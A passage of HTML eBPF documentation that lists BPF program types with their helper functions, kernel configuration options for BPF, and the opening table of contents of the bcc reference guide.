<li>GPL</li>
|
||
<li>GPL v2</li>
|
||
<li>GPL and additional rights</li>
|
||
<li>Dual BSD/GPL</li>
|
||
<li>Dual MIT/GPL</li>
|
||
<li>Dual MPL/GPL</li>
|
||
</ul>
|
||
<p>Check the list of GPL-compatible licenses in your <a href="https://github.com/torvalds/linux/blob/master/include/linux/license.h">kernel source code</a>.</p>
|
||
<h2 id="program-types-1"><a class="header" href="#program-types-1">Program Types</a></h2>
|
||
<p>The list of program types and supported helper functions can be retrieved with:</p>
|
||
<pre><code class="language-sh">git grep -W 'func_proto(enum bpf_func_id func_id' kernel/ net/ drivers/
|
||
</code></pre>
|
||
<div class="table-wrapper"><table><thead><tr><th>Program Type</th><th>Helper Functions</th></tr></thead><tbody>
|
||
<tr><td><code>BPF_PROG_TYPE_SOCKET_FILTER</code></td><td><code>BPF_FUNC_skb_load_bytes()</code> <br> <code>BPF_FUNC_skb_load_bytes_relative()</code> <br> <code>BPF_FUNC_get_socket_cookie()</code> <br> <code>BPF_FUNC_get_socket_uid()</code> <br> <code>BPF_FUNC_perf_event_output()</code> <br> <code>Base functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_KPROBE</code></td><td><code>BPF_FUNC_perf_event_output()</code> <br> <code>BPF_FUNC_get_stackid()</code> <br> <code>BPF_FUNC_get_stack()</code> <br> <code>BPF_FUNC_perf_event_read_value()</code> <br> <code>BPF_FUNC_override_return()</code> <br> <code>Tracing functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_SCHED_CLS</code> <br> <code>BPF_PROG_TYPE_SCHED_ACT</code></td><td><code>BPF_FUNC_skb_store_bytes()</code> <br> <code>BPF_FUNC_skb_load_bytes()</code> <br> <code>BPF_FUNC_skb_load_bytes_relative()</code> <br> <code>BPF_FUNC_skb_pull_data()</code> <br> <code>BPF_FUNC_csum_diff()</code> <br> <code>BPF_FUNC_csum_update()</code> <br> <code>BPF_FUNC_l3_csum_replace()</code> <br> <code>BPF_FUNC_l4_csum_replace()</code> <br> <code>BPF_FUNC_clone_redirect()</code> <br> <code>BPF_FUNC_get_cgroup_classid()</code> <br> <code>BPF_FUNC_skb_vlan_push()</code> <br> <code>BPF_FUNC_skb_vlan_pop()</code> <br> <code>BPF_FUNC_skb_change_proto()</code> <br> <code>BPF_FUNC_skb_change_type()</code> <br> <code>BPF_FUNC_skb_adjust_room()</code> <br> <code>BPF_FUNC_skb_change_tail()</code> <br> <code>BPF_FUNC_skb_get_tunnel_key()</code> <br> <code>BPF_FUNC_skb_set_tunnel_key()</code> <br> <code>BPF_FUNC_skb_get_tunnel_opt()</code> <br> <code>BPF_FUNC_skb_set_tunnel_opt()</code> <br> <code>BPF_FUNC_redirect()</code> <br> <code>BPF_FUNC_get_route_realm()</code> <br> <code>BPF_FUNC_get_hash_recalc()</code> <br> <code>BPF_FUNC_set_hash_invalid()</code> <br> <code>BPF_FUNC_set_hash()</code> <br> <code>BPF_FUNC_perf_event_output()</code> <br> <code>BPF_FUNC_get_smp_processor_id()</code> <br> <code>BPF_FUNC_skb_under_cgroup()</code> <br> <code>BPF_FUNC_get_socket_cookie()</code> <br> <code>BPF_FUNC_get_socket_uid()</code> <br> <code>BPF_FUNC_fib_lookup()</code> <br> <code>BPF_FUNC_skb_get_xfrm_state()</code> <br> <code>BPF_FUNC_skb_cgroup_id()</code> <br> <code>Base functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_TRACEPOINT</code></td><td><code>BPF_FUNC_perf_event_output()</code> <br> <code>BPF_FUNC_get_stackid()</code> <br> <code>BPF_FUNC_get_stack()</code> <br> <code>BPF_FUNC_d_path()</code> <br> <code>Tracing functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_XDP</code></td><td><code>BPF_FUNC_perf_event_output()</code> <br> <code>BPF_FUNC_get_smp_processor_id()</code> <br> <code>BPF_FUNC_csum_diff()</code> <br> <code>BPF_FUNC_xdp_adjust_head()</code> <br> <code>BPF_FUNC_xdp_adjust_meta()</code> <br> <code>BPF_FUNC_redirect()</code> <br> <code>BPF_FUNC_redirect_map()</code> <br> <code>BPF_FUNC_xdp_adjust_tail()</code> <br> <code>BPF_FUNC_fib_lookup()</code> <br> <code>Base functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_PERF_EVENT</code></td><td><code>BPF_FUNC_perf_event_output()</code> <br> <code>BPF_FUNC_get_stackid()</code> <br> <code>BPF_FUNC_get_stack()</code> <br> <code>BPF_FUNC_perf_prog_read_value()</code> <br> <code>Tracing functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_CGROUP_SKB</code></td><td><code>BPF_FUNC_skb_load_bytes()</code> <br> <code>BPF_FUNC_skb_load_bytes_relative()</code> <br> <code>BPF_FUNC_get_socket_cookie()</code> <br> <code>BPF_FUNC_get_socket_uid()</code> <br> <code>Base functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_CGROUP_SOCK</code></td><td><code>BPF_FUNC_get_current_uid_gid()</code> <br> <code>Base functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_LWT_IN</code></td><td><code>BPF_FUNC_lwt_push_encap()</code> <br> <code>LWT functions</code> <br> <code>Base functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_LWT_OUT</code></td><td><code>LWT functions</code> <br> <code>Base functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_LWT_XMIT</code></td><td><code>BPF_FUNC_skb_get_tunnel_key()</code> <br> <code>BPF_FUNC_skb_set_tunnel_key()</code> <br> <code>BPF_FUNC_skb_get_tunnel_opt()</code> <br> <code>BPF_FUNC_skb_set_tunnel_opt()</code> <br> <code>BPF_FUNC_redirect()</code> <br> <code>BPF_FUNC_clone_redirect()</code> <br> <code>BPF_FUNC_skb_change_tail()</code> <br> <code>BPF_FUNC_skb_change_head()</code> <br> <code>BPF_FUNC_skb_store_bytes()</code> <br> <code>BPF_FUNC_csum_update()</code> <br> <code>BPF_FUNC_l3_csum_replace()</code> <br> <code>BPF_FUNC_l4_csum_replace()</code> <br> <code>BPF_FUNC_set_hash_invalid()</code> <br> <code>LWT functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_SOCK_OPS</code></td><td><code>BPF_FUNC_setsockopt()</code> <br> <code>BPF_FUNC_getsockopt()</code> <br> <code>BPF_FUNC_sock_ops_cb_flags_set()</code> <br> <code>BPF_FUNC_sock_map_update()</code> <br> <code>BPF_FUNC_sock_hash_update()</code> <br> <code>BPF_FUNC_get_socket_cookie()</code> <br> <code>Base functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_SK_SKB</code></td><td><code>BPF_FUNC_skb_store_bytes()</code> <br> <code>BPF_FUNC_skb_load_bytes()</code> <br> <code>BPF_FUNC_skb_pull_data()</code> <br> <code>BPF_FUNC_skb_change_tail()</code> <br> <code>BPF_FUNC_skb_change_head()</code> <br> <code>BPF_FUNC_get_socket_cookie()</code> <br> <code>BPF_FUNC_get_socket_uid()</code> <br> <code>BPF_FUNC_sk_redirect_map()</code> <br> <code>BPF_FUNC_sk_redirect_hash()</code> <br> <code>BPF_FUNC_sk_lookup_tcp()</code> <br> <code>BPF_FUNC_sk_lookup_udp()</code> <br> <code>BPF_FUNC_sk_release()</code> <br> <code>Base functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_CGROUP_DEVICE</code></td><td><code>BPF_FUNC_map_lookup_elem()</code> <br> <code>BPF_FUNC_map_update_elem()</code> <br> <code>BPF_FUNC_map_delete_elem()</code> <br> <code>BPF_FUNC_get_current_uid_gid()</code> <br> <code>BPF_FUNC_trace_printk()</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_SK_MSG</code></td><td><code>BPF_FUNC_msg_redirect_map()</code> <br> <code>BPF_FUNC_msg_redirect_hash()</code> <br> <code>BPF_FUNC_msg_apply_bytes()</code> <br> <code>BPF_FUNC_msg_cork_bytes()</code> <br> <code>BPF_FUNC_msg_pull_data()</code> <br> <code>BPF_FUNC_msg_push_data()</code> <br> <code>BPF_FUNC_msg_pop_data()</code> <br> <code>Base functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_RAW_TRACEPOINT</code></td><td><code>BPF_FUNC_perf_event_output()</code> <br> <code>BPF_FUNC_get_stackid()</code> <br> <code>BPF_FUNC_get_stack()</code> <br> <code>BPF_FUNC_skb_output()</code> <br> <code>Tracing functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_CGROUP_SOCK_ADDR</code></td><td><code>BPF_FUNC_get_current_uid_gid()</code> <br> <code>BPF_FUNC_bind()</code> <br> <code>BPF_FUNC_get_socket_cookie()</code> <br> <code>Base functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_LWT_SEG6LOCAL</code></td><td><code>BPF_FUNC_lwt_seg6_store_bytes()</code> <br> <code>BPF_FUNC_lwt_seg6_action()</code> <br> <code>BPF_FUNC_lwt_seg6_adjust_srh()</code> <br> <code>LWT functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_LIRC_MODE2</code></td><td><code>BPF_FUNC_rc_repeat()</code> <br> <code>BPF_FUNC_rc_keydown()</code> <br> <code>BPF_FUNC_rc_pointer_rel()</code> <br> <code>BPF_FUNC_map_lookup_elem()</code> <br> <code>BPF_FUNC_map_update_elem()</code> <br> <code>BPF_FUNC_map_delete_elem()</code> <br> <code>BPF_FUNC_ktime_get_ns()</code> <br> <code>BPF_FUNC_tail_call()</code> <br> <code>BPF_FUNC_get_prandom_u32()</code> <br> <code>BPF_FUNC_trace_printk()</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_SK_REUSEPORT</code></td><td><code>BPF_FUNC_sk_select_reuseport()</code> <br> <code>BPF_FUNC_skb_load_bytes()</code> <br> <code>BPF_FUNC_load_bytes_relative()</code> <br> <code>Base functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_FLOW_DISSECTOR</code></td><td><code>BPF_FUNC_skb_load_bytes()</code> <br> <code>Base functions</code></td></tr>
|
||
</tbody></table>
|
||
</div><div class="table-wrapper"><table><thead><tr><th>Function Group</th><th>Functions</th></tr></thead><tbody>
|
||
<tr><td><code>Base functions</code></td><td><code>BPF_FUNC_map_lookup_elem()</code> <br> <code>BPF_FUNC_map_update_elem()</code> <br> <code>BPF_FUNC_map_delete_elem()</code> <br> <code>BPF_FUNC_map_peek_elem()</code> <br> <code>BPF_FUNC_map_pop_elem()</code> <br> <code>BPF_FUNC_map_push_elem()</code> <br> <code>BPF_FUNC_get_prandom_u32()</code> <br> <code>BPF_FUNC_get_smp_processor_id()</code> <br> <code>BPF_FUNC_get_numa_node_id()</code> <br> <code>BPF_FUNC_tail_call()</code> <br> <code>BPF_FUNC_ktime_get_boot_ns()</code> <br> <code>BPF_FUNC_ktime_get_ns()</code> <br> <code>BPF_FUNC_trace_printk()</code> <br> <code>BPF_FUNC_spin_lock()</code> <br> <code>BPF_FUNC_spin_unlock()</code></td></tr>
|
||
<tr><td><code>Tracing functions</code></td><td><code>BPF_FUNC_map_lookup_elem()</code> <br> <code>BPF_FUNC_map_update_elem()</code> <br> <code>BPF_FUNC_map_delete_elem()</code> <br> <code>BPF_FUNC_probe_read()</code> <br> <code>BPF_FUNC_ktime_get_boot_ns()</code> <br> <code>BPF_FUNC_ktime_get_ns()</code> <br> <code>BPF_FUNC_tail_call()</code> <br> <code>BPF_FUNC_get_current_pid_tgid()</code> <br> <code>BPF_FUNC_get_current_task()</code> <br> <code>BPF_FUNC_get_current_uid_gid()</code> <br> <code>BPF_FUNC_get_current_comm()</code> <br> <code>BPF_FUNC_trace_printk()</code> <br> <code>BPF_FUNC_get_smp_processor_id()</code> <br> <code>BPF_FUNC_get_numa_node_id()</code> <br> <code>BPF_FUNC_perf_event_read()</code> <br> <code>BPF_FUNC_probe_write_user()</code> <br> <code>BPF_FUNC_current_task_under_cgroup()</code> <br> <code>BPF_FUNC_get_prandom_u32()</code> <br> <code>BPF_FUNC_probe_read_str()</code> <br> <code>BPF_FUNC_get_current_cgroup_id()</code> <br> <code>BPF_FUNC_send_signal()</code> <br> <code>BPF_FUNC_probe_read_kernel()</code> <br> <code>BPF_FUNC_probe_read_kernel_str()</code> <br> <code>BPF_FUNC_probe_read_user()</code> <br> <code>BPF_FUNC_probe_read_user_str()</code> <br> <code>BPF_FUNC_send_signal_thread()</code> <br> <code>BPF_FUNC_get_ns_current_pid_tgid()</code> <br> <code>BPF_FUNC_xdp_output()</code> <br> <code>BPF_FUNC_get_task_stack()</code></td></tr>
|
||
<tr><td><code>LWT functions</code></td><td><code>BPF_FUNC_skb_load_bytes()</code> <br> <code>BPF_FUNC_skb_pull_data()</code> <br> <code>BPF_FUNC_csum_diff()</code> <br> <code>BPF_FUNC_get_cgroup_classid()</code> <br> <code>BPF_FUNC_get_route_realm()</code> <br> <code>BPF_FUNC_get_hash_recalc()</code> <br> <code>BPF_FUNC_perf_event_output()</code> <br> <code>BPF_FUNC_get_smp_processor_id()</code> <br> <code>BPF_FUNC_skb_under_cgroup()</code></td></tr>
|
||
</tbody></table>
|
||
</div><div style="break-before: page; page-break-before: always;"></div><h1 id="kernel-configuration-for-bpf-features"><a class="header" href="#kernel-configuration-for-bpf-features">Kernel Configuration for BPF Features</a></h1>
|
||
<h2 id="bpf-related-kernel-configurations"><a class="header" href="#bpf-related-kernel-configurations">BPF Related Kernel Configurations</a></h2>
|
||
<div class="table-wrapper"><table><thead><tr><th style="text-align: left">Functionalities</th><th style="text-align: left">Kernel Configuration</th><th style="text-align: left">Description</th></tr></thead><tbody>
|
||
<tr><td style="text-align: left"><strong>Basic</strong></td><td style="text-align: left">CONFIG_BPF_SYSCALL</td><td style="text-align: left">Enable the bpf() system call</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_BPF_JIT</td><td style="text-align: left">BPF programs are normally handled by a BPF interpreter. This option allows the kernel to generate native code when a program is loaded into the kernel. This will significantly speed-up processing of BPF programs</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_HAVE_BPF_JIT</td><td style="text-align: left">Enable BPF Just In Time compiler</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_HAVE_EBPF_JIT</td><td style="text-align: left">Extended BPF JIT (eBPF)</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_HAVE_CBPF_JIT</td><td style="text-align: left">Classic BPF JIT (cBPF)</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_MODULES</td><td style="text-align: left">Enable to build loadable kernel modules</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_BPF</td><td style="text-align: left">BPF VM interpreter</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_BPF_EVENTS</td><td style="text-align: left">Allow the user to attach BPF programs to kprobe, uprobe, and tracepoint events</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_PERF_EVENTS</td><td style="text-align: left">Kernel performance events and counters</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_HAVE_PERF_EVENTS</td><td style="text-align: left">Enable perf events</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_PROFILING</td><td style="text-align: left">Enable the extended profiling support mechanisms used by profilers</td></tr>
|
||
<tr><td style="text-align: left"><strong>BTF</strong></td><td style="text-align: left">CONFIG_DEBUG_INFO_BTF</td><td style="text-align: left">Generate deduplicated BTF type information from DWARF debug info</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_PAHOLE_HAS_SPLIT_BTF</td><td style="text-align: left">Generate BTF for each selected kernel module</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_DEBUG_INFO_BTF_MODULES</td><td style="text-align: left">Generate compact split BTF type information for kernel modules</td></tr>
|
||
<tr><td style="text-align: left"><strong>Security</strong></td><td style="text-align: left">CONFIG_BPF_JIT_ALWAYS_ON</td><td style="text-align: left">Enable BPF JIT and removes BPF interpreter to avoid speculative execution</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_BPF_UNPRIV_DEFAULT_OFF</td><td style="text-align: left">Disable unprivileged BPF by default by setting</td></tr>
|
||
<tr><td style="text-align: left"><strong>Cgroup</strong></td><td style="text-align: left">CONFIG_CGROUP_BPF</td><td style="text-align: left">Support for BPF programs attached to cgroups</td></tr>
|
||
<tr><td style="text-align: left"><strong>Network</strong></td><td style="text-align: left">CONFIG_BPFILTER</td><td style="text-align: left">BPF based packet filtering framework (BPFILTER)</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_BPFILTER_UMH</td><td style="text-align: left">This builds bpfilter kernel module with embedded user mode helper</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_NET_CLS_BPF</td><td style="text-align: left">BPF-based classifier - to classify packets based on programmable BPF (JIT'ed) filters as an alternative to ematches</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_NET_ACT_BPF</td><td style="text-align: left">Execute BPF code on packets. The BPF code will decide if the packet should be dropped or not</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_BPF_STREAM_PARSER</td><td style="text-align: left">Enable this to allow a TCP stream parser to be used with BPF_MAP_TYPE_SOCKMAP</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_LWTUNNEL_BPF</td><td style="text-align: left">Allow to run BPF programs as a nexthop action following a route lookup for incoming and outgoing packets</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_NETFILTER_XT_MATCH_BPF</td><td style="text-align: left">BPF matching applies a linux socket filter to each packet and accepts those for which the filter returns non-zero</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_IPV6_SEG6_BPF</td><td style="text-align: left">To support BPF seg6local hook. bpf: Add IPv6 Segment Routing helpersy. <a href="https://github.com/torvalds/linux/commit/fe94cc290f535709d3c5ebd1e472dfd0aec7ee7">Reference</a></td></tr>
|
||
<tr><td style="text-align: left"><strong>kprobes</strong></td><td style="text-align: left">CONFIG_KPROBE_EVENTS</td><td style="text-align: left">This allows the user to add tracing events (similar to tracepoints) on the fly via the ftrace interface</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_KPROBES</td><td style="text-align: left">Enable kprobes-based dynamic events</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_HAVE_KPROBES</td><td style="text-align: left">Check if krpobes enabled</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_HAVE_REGS_AND_STACK_ACCESS_API</td><td style="text-align: left">This symbol should be selected by an architecture if it supports the API needed to access registers and stack entries from pt_regs. For example the kprobes-based event tracer needs this API.</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_KPROBES_ON_FTRACE</td><td style="text-align: left">Have kprobes on function tracer if arch supports full passing of pt_regs to function tracing</td></tr>
|
||
<tr><td style="text-align: left"><strong>kprobe multi</strong></td><td style="text-align: left">CONFIG_FPROBE</td><td style="text-align: left">Enable fprobe to attach the probe on multiple functions at once</td></tr>
|
||
<tr><td style="text-align: left"><strong>kprobe override</strong></td><td style="text-align: left">CONFIG_BPF_KPROBE_OVERRIDE</td><td style="text-align: left">Enable BPF programs to override a kprobed function</td></tr>
|
||
<tr><td style="text-align: left"><strong>uprobes</strong></td><td style="text-align: left">CONFIG_UPROBE_EVENTS</td><td style="text-align: left">Enable uprobes-based dynamic events</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_ARCH_SUPPORTS_UPROBES</td><td style="text-align: left">Arch specific uprobes support</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_UPROBES</td><td style="text-align: left">Uprobes is the user-space counterpart to kprobes: they enable instrumentation applications (such as 'perf probe') to establish unintrusive probes in user-space binaries and libraries, by executing handler functions when the probes are hit by user-space applications.</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_MMU</td><td style="text-align: left">MMU-based virtualised addressing space support by paged memory management</td></tr>
|
||
<tr><td style="text-align: left"><strong>Tracepoints</strong></td><td style="text-align: left">CONFIG_TRACEPOINTS</td><td style="text-align: left">Enable inserting tracepoints in the kernel and connect to proble functions</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_HAVE_SYSCALL_TRACEPOINTS</td><td style="text-align: left">Enable syscall enter/exit tracing</td></tr>
|
||
<tr><td style="text-align: left"><strong>Raw Tracepoints</strong></td><td style="text-align: left">Same as Tracepoints</td><td style="text-align: left"></td></tr>
|
||
<tr><td style="text-align: left"><strong>LSM</strong></td><td style="text-align: left">CONFIG_BPF_LSM</td><td style="text-align: left">Enable instrumentation of the security hooks with BPF programs for implementing dynamic MAC and Audit Policies</td></tr>
|
||
<tr><td style="text-align: left"><strong>LIRC</strong></td><td style="text-align: left">CONFIG_BPF_LIRC_MODE2</td><td style="text-align: left">Allow attaching BPF programs to a lirc device</td></tr>
|
||
</tbody></table>
|
||
</div><div style="break-before: page; page-break-before: always;"></div><h1 id="bcc-reference-guide"><a class="header" href="#bcc-reference-guide">bcc Reference Guide</a></h1>
|
||
<p>Intended for search (Ctrl-F) and reference. For tutorials, start with <a href="bcc-documents/tutorial.html">tutorial.md</a>.</p>
|
||
<p>This guide is incomplete. If something feels missing, check the bcc and kernel source. And if you confirm we're missing something, please send a pull request to fix it, and help out everyone.</p>
|
||
<h2 id="contents"><a class="header" href="#contents">Contents</a></h2>
|
||
<ul>
|
||
<li>
|
||
<p><a href="bcc-documents/reference_guide.html#bpf-c">BPF C</a></p>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#events--arguments">Events & Arguments</a>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#1-kprobes">1. kprobes</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#2-kretprobes">2. kretprobes</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#3-tracepoints">3. Tracepoints</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#4-uprobes">4. uprobes</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#5-uretprobes">5. uretprobes</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#6-usdt-probes">6. USDT probes</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#7-raw-tracepoints">7. Raw Tracepoints</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#8-system-call-tracepoints">8. system call tracepoints</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#9-kfuncs">9. kfuncs</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#10-kretfuncs">10. kretfuncs</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#11-lsm-probes">11. lsm probes</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#12-bpf-iterators">12. bpf iterators</a></li>
|
||
</ul>
|
||
</li>
|
||
<li><a href="bcc-documents/reference_guide.html#data">Data</a>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#1-bpf_probe_read_kernel">1. bpf_probe_read_kernel()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#2-bpf_probe_read_kernel_str">2. bpf_probe_read_kernel_str()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#3-bpf_ktime_get_ns">3. bpf_ktime_get_ns()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#4-bpf_get_current_pid_tgid">4. bpf_get_current_pid_tgid()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#5-bpf_get_current_uid_gid">5. bpf_get_current_uid_gid()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#6-bpf_get_current_comm">6. bpf_get_current_comm()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#7-bpf_get_current_task">7. bpf_get_current_task()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#8-bpf_log2l">8. bpf_log2l()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#9-bpf_get_prandom_u32">9. bpf_get_prandom_u32()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#10-bpf_probe_read_user">10. bpf_probe_read_user()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#11-bpf_probe_read_user_str">11. bpf_probe_read_user_str()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#12-bpf_get_ns_current_pid_tgid">12. bpf_get_ns_current_pid_tgid()</a></li>
|
||
</ul>
|
||
</li>
|
||
<li><a href="bcc-documents/reference_guide.html#debugging">Debugging</a>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#1-bpf_override_return">1. bpf_override_return()</a></li>
|
||
</ul>
|
||
</li>
|
||
<li><a href="bcc-documents/reference_guide.html#output">Output</a>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#1-bpf_trace_printk">1. bpf_trace_printk()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#2-bpf_perf_output">2. BPF_PERF_OUTPUT</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#3-perf_submit">3. perf_submit()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#4-perf_submit_skb">4. perf_submit_skb()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#5-bpf_ringbuf_output">5. BPF_RINGBUF_OUTPUT</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#6-ringbuf_output">6. ringbuf_output()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#7-ringbuf_reserve">7. ringbuf_reserve()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#8-ringbuf_submit">8. ringbuf_submit()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#9-ringbuf_discard">9. ringbuf_discard()</a></li>
|
||
</ul>
|
||
</li>
|
||
<li><a href="bcc-documents/reference_guide.html#maps">Maps</a>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#1-bpf_table">1. BPF_TABLE</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#2-bpf_hash">2. BPF_HASH</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#3-bpf_array">3. BPF_ARRAY</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#4-bpf_histogram">4. BPF_HISTOGRAM</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#5-bpf_stack_trace">5. BPF_STACK_TRACE</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#6-bpf_perf_array">6. BPF_PERF_ARRAY</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#7-bpf_percpu_hash">7. BPF_PERCPU_HASH</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#8-bpf_percpu_array">8. BPF_PERCPU_ARRAY</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#9-bpf_lpm_trie">9. BPF_LPM_TRIE</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#10-bpf_prog_array">10. BPF_PROG_ARRAY</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#11-bpf_devmap">11. BPF_DEVMAP</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#12-bpf_cpumap">12. BPF_CPUMAP</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#13-bpf_xskmap">13. BPF_XSKMAP</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#14-bpf_array_of_maps">14. BPF_ARRAY_OF_MAPS</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#15-bpf_hash_of_maps">15. BPF_HASH_OF_MAPS</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#16-bpf_stack">16. BPF_STACK</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#17-bpf_queue">17. BPF_QUEUE</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#18-bpf_sockhash">18. BPF_SOCKHASH</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#19-maplookup">19. map.lookup()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#20-maplookup_or_try_init">20. map.lookup_or_try_init()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#21-mapdelete">21. map.delete()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#22-mapupdate">22. map.update()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#23-mapinsert">23. map.insert()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#24-mapincrement">24. map.increment()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#25-mapget_stackid">25. map.get_stackid()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#26-mapperf_read">26. map.perf_read()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#27-mapcall">27. map.call()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#28-mapredirect_map">28. map.redirect_map()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#29-mappush">29. map.push()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#30-mappop">30. map.pop()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#31-mappeek">31. map.peek()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#32-mapsock_hash_update">32. map.sock_hash_update()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#33-mapmsg_redirect_hash">33. map.msg_redirect_hash()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#34-mapsk_redirect_hash">34. map.sk_redirect_hash()</a></li>
|
||
</ul>
|
||
</li>
